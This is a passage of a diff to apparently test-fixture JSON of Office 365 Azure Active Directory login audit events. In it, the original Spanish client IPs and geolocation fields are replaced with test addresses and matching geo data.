"OAuth2:Authorize", 
@@ -5042,20 +4961,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -5073,8 +4990,8 @@ }, { "@timestamp": "2020-02-09T15:28:52.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5092,7 +5009,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 73345, + "log.offset": 73253, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -5109,10 +5026,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:28:52", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5141,20 +5058,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -5172,8 +5087,8 @@ }, { "@timestamp": "2020-02-10T15:13:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -5191,7 +5106,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 74795, + "log.offset": 74701, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5208,10 +5123,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:13:37", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5240,20 +5155,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -5271,8 +5184,8 @@ }, { "@timestamp": "2020-02-09T15:28:52.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5290,7 +5203,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 76246, + "log.offset": 76150, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5307,10 +5220,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:28:52", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -5339,20 +5252,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -5370,8 +5281,8 @@ }, { "@timestamp": "2020-02-10T15:13:01.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5389,7 +5300,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 77696, + "log.offset": 77598, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -5406,10 +5317,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:13:01", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5438,20 +5349,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -5469,8 +5378,8 @@ }, { "@timestamp": "2020-02-12T10:53:12.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -5488,7 +5397,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 79146, + "log.offset": 79046, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5505,10 +5414,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T10:53:12", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5537,20 +5446,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], 
@@ -5568,8 +5476,8 @@ }, { "@timestamp": "2020-02-12T10:52:06.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5587,7 +5495,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 80596, + "log.offset": 80496, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5604,10 +5512,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T10:52:06", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -5636,20 +5544,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], @@ -5667,8 +5574,8 @@ }, { "@timestamp": "2020-02-08T14:33:50.000Z", - "client.address": "37.29.234.179", - "client.ip": "37.29.234.179", + "client.address": "67.43.156.12", + "client.ip": "67.43.156.12", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5686,7 +5593,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 82047, + "log.offset": 81947, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -5703,10 +5610,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "37.29.234.179", + "o365.audit.ActorIpAddress": "67.43.156.12", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "37.29.234.179", + "o365.audit.ClientIP": "67.43.156.12", "o365.audit.CreationTime": "2020-02-08T14:33:50", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5735,17 +5642,16 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "37.29.234.179", + "related.ip": "67.43.156.12", "related.user": "asr", "service.type": "o365", - "source.as.number": 16299, - "source.as.organization.name": "XFERA Moviles S.A.", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.4172, - "source.geo.location.lon": -3.684, - "source.ip": "37.29.234.179", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "forwarded" ], @@ -5763,8 +5669,8 @@ }, { "@timestamp": "2020-02-10T15:13:38.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5782,7 +5688,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 83439, + "log.offset": 83337, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -5799,10 +5705,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:13:38", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5831,20 +5737,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -5862,8 +5766,8 @@ }, { "@timestamp": "2020-02-07T16:44:05.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -5881,7 +5785,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 84890, + "log.offset": 84786, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5898,10 +5802,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:44:05", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -5930,20 +5834,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], 
@@ -5961,8 +5863,8 @@ }, { "@timestamp": "2020-02-09T15:28:51.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -5980,7 +5882,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 86340, + "log.offset": 86232, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5997,10 +5899,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:28:51", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -6029,20 +5931,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -6060,8 +5960,8 @@ }, { "@timestamp": "2020-02-09T15:25:21.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -6079,7 +5979,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 87732, + "log.offset": 87622, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -6096,10 +5996,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:25:21", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -6128,20 +6028,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -6159,8 +6057,8 @@ }, { "@timestamp": "2020-02-12T21:38:20.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -6178,7 +6076,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 89182, + "log.offset": 89070, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -6195,10 +6093,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T21:38:20", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -6227,20 +6125,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], 
@@ -6258,8 +6155,8 @@ }, { "@timestamp": "2020-02-07T16:44:02.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -6277,7 +6174,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 90575, + "log.offset": 90463, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -6294,10 +6191,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:44:02", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -6326,20 +6223,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", 